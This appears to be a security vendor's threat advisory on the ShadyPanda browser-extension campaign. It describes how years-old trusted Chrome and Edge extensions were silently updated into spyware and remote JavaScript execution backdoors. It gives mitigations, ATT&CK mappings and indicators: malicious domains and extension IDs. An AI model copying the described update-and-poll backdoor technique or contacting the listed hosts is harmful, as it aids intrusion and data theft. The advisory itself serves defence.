Comprehensive Threat Exposure Management Platform
Hive Pro recognized in Gartner® Magic Quadrant™ for Exposure Assessment Platform, 2025 Watch platform in action
ShadyPanda threat actor, a likely China-based cybercriminal group, orchestrated a seven-year browser extension malware operation that compromised more than 4.3 million Chrome and Edge users worldwide. The ShadyPanda campaign exploited the trust built into browser extension marketplaces by running clean, functional extensions for years before converting them into delivery systems for silent malicious updates. This ShadyPanda operation split into two core attack tracks: a remote code execution backdoor affecting roughly 300,000 users through five extensions including Google Featured and Verified Clean Master, and a large-scale spyware effort reaching more than 4 million users through five additional extensions that funneled browsing data to servers in China. The ShadyPanda threat actor demonstrated long-term operational discipline and precise understanding of marketplace security blind spots, maintaining legitimate extension behavior to grow large user bases before activating malicious payloads. Google’s endorsement of these ShadyPanda extensions through Featured and Verified badges amplified reach and credibility, enabling the threat actor to weaponize the extension marketplace itself. Over seven years, ShadyPanda refined a sophisticated method that blended trust-building, mass adoption through affiliate fraud targeting platforms like eBay, Amazon, and Booking.com, and silent malicious update delivery with remote execution frameworks enabling credential theft and session hijacking capabilities.
ShadyPanda is a likely China-based threat actor behind a seven-year browser extension malware operation that compromised more than 4.3 million Chrome and Edge users globally. The ShadyPanda group exploited the trust built into extension marketplaces by running clean, functional browser extensions for years before converting them into delivery systems for silent malicious updates. This long-term patience strategy allowed ShadyPanda to build massive user bases across Google Chrome and Microsoft Edge platforms before weaponizing the extensions for espionage and financial gain.
The ShadyPanda operation split into two core attack tracks demonstrating sophisticated threat capabilities. First, a remote code execution backdoor affecting roughly 300,000 users was deployed through five browser extensions, including Google Featured and Verified Clean Master extensions that carried marketplace credibility badges. Second, a large-scale spyware effort reached more than 4 million users through five additional ShadyPanda extensions that systematically funneled browsing data, search queries, and behavioral information to command-and-control servers located in China. This dual-track approach maximized both espionage collection and financial fraud opportunities.
The threat actor ShadyPanda demonstrated long-term operational discipline and a precise understanding of browser extension marketplace security blind spots. The ShadyPanda strategy hinged on patience, maintaining completely legitimate extension behavior to grow large user bases over multiple years before activating malicious payloads. Google’s official endorsement of these ShadyPanda extensions through Featured and Verified badges amplified reach and credibility, enabling the threat actor to weaponize the marketplace trust system itself. Over seven years, ShadyPanda refined a sophisticated method that blended trust-building, mass user adoption, and silent malicious update delivery mechanisms.
The core profit engine for ShadyPanda operations was systematic affiliate fraud. When users visited e-commerce platforms like eBay, Amazon, or Booking.com, the ShadyPanda extensions injected hidden affiliate codes, silently diverting sales commissions to the threat actor. The malicious extensions also embedded Google Analytics trackers to harvest and monetize detailed behavioral data, logging search queries, site visits, and click patterns. This dual monetization strategy generated revenue from both fraudulent affiliate commissions and sale of harvested user behavioral data.
Each ShadyPanda-infected browser carried a sophisticated remote execution framework that continuously polled for new commands from attacker infrastructure, retrieved arbitrary JavaScript code, and executed it with full browser permissions granted to the extension. The ShadyPanda extensions also enabled adversary-in-the-middle attack capabilities, supporting credential theft, session hijacking, and live code injection across websites visited by compromised users. Even after several ShadyPanda extensions were identified and taken down from official marketplaces, the threat actor continued refining its tactics and pursuing new malicious extension delivery paths, demonstrating persistent commitment to the browser extension attack vector.
Eliminate Trust-Based Extension Approval: Remove organizational reliance on browser extension marketplace verification labels. Treat Google Featured and Verified badges as non-security indicators and apply independent security vetting before approving any browser extension deployment. The ShadyPanda campaign demonstrates that marketplace endorsements provide no guarantee against malicious behavior and can actually amplify threat actor reach.
Harden Enterprise Browser Baselines: Minimize permitted browser extensions to a strictly vetted set with demonstrated business value. Block consumer-grade browser extensions and tools that provide unnecessary attack surface with no operational value. Implement extension allowlisting policies that prevent users from installing arbitrary extensions from Chrome Web Store or Edge Add-ons marketplace without security approval.
Mandate Network Controls for Extension Traffic: Inspect outbound network connections from browser extension processes using network security controls. Flag suspicious analytics beacons, connections to domains associated with ShadyPanda infrastructure, and unauthorized data exfiltration paths. Monitor for affiliate code injection behavior and unexpected command-and-control communications from extension processes.
Enforce Continuous Extension Behavior Monitoring: Track real-time extension behaviors such as search query redirection, affiliate code injection into e-commerce sites, or unauthorized data transmission to external servers. Detect malicious behavioral shifts in previously legitimate extensions instead of relying solely on static marketplace reviews. Deploy browser security solutions capable of monitoring extension activity and alerting on suspicious changes matching ShadyPanda tactics.
Domains: extensionplay[.]com, yearnnewtab[.]com, api[.]cgatgpt[.]net, dergoodting[.]com, cleanmasters[.]store, s-85283[.]gotocdn[.]com, s-82923[.]gotocdn[.]com
Browser Extension IDs: eagiakjmjnblliacokhcalebgnhellfi, ibiejjpajlfljcgjndbonclhcbdcamai, ogjneoecnllmjcegcfpaamfpbiaaiekh, jbnopeoocgbmnochaadfnhiiimfpbpmf, cdgonefipacceedbkflolomdegncceid, gipnpcencdgljnaecpekokmpgnhgpela, bpgaffohfacaamplbbojgbiicfgedmoi, ineempkjpmbdejmdgienaphomigjjiej, nnnklgkfdfbdijeeglhjfleaoagiagig, and numerous additional malicious extension IDs associated with the ShadyPanda campaign across Chrome and Edge platforms.
ShadyPanda threat actor demonstrates tactics spanning Initial Access (TA0001) via Drive-by Compromise (T1189), Execution (TA0002) through Command and Scripting Interpreter including JavaScript (T1059, T1059.007), Persistence (TA0003) via Software Extensions and Browser Extensions (T1176, T1176.001), Defense Evasion (TA0005) using Obfuscated Files or Information (T1027), Execution Guardrails (T1480), and Masquerading (T1036), Discovery (TA0007) including Browser Information Discovery (T1217), Collection (TA0009) through Steal Web Session Cookie (T1539), Browser Session Hijacking (T1185), Data from Local System (T1005), and Input Capture via Credential API Hooking (T1056, T1056.004), Command and Control (TA0011) via Application Layer Protocol and Web Protocols (T1071, T1071.001), Encrypted Channel (T1573), and Adversary-in-the-Middle (T1557), and Exfiltration (TA0010) including Exfiltration Over C2 Channel (T1041) and Exfiltration Over Web Service (T1567).
https://www.koi.ai/blog/4-million-browsers-infected-inside-shadypanda-7-year-malware-campaign
https://hivepro.com/threat-advisory/i-paid-twice-inside-the-booking-com-phishing-fraud/
Get through updates and upcoming events, and more directly in your inbox